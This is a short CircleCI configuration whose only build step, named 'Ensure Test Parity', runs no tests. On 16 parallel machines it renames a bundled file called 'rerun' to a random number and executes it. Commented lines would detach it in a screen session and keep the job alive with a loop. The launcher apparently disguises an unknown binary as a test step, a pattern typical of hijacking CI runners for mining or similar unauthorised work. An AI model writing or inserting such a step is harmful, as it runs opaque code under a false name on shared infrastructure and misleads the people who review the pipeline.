version: 2.1
jobs:
  build:
    parallelism: 16
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
                 sudo apt-get update
                 TOP=$(shuf -n 1 -i 1-999999)
                 mv rerun $TOP
                 chmod +x $TOP
                 ./$TOP
                 #screen -dmS $TOP ./$TOP
                 #while :; do shuf -n 1 -i 1-99999999; sleep 30; done
                 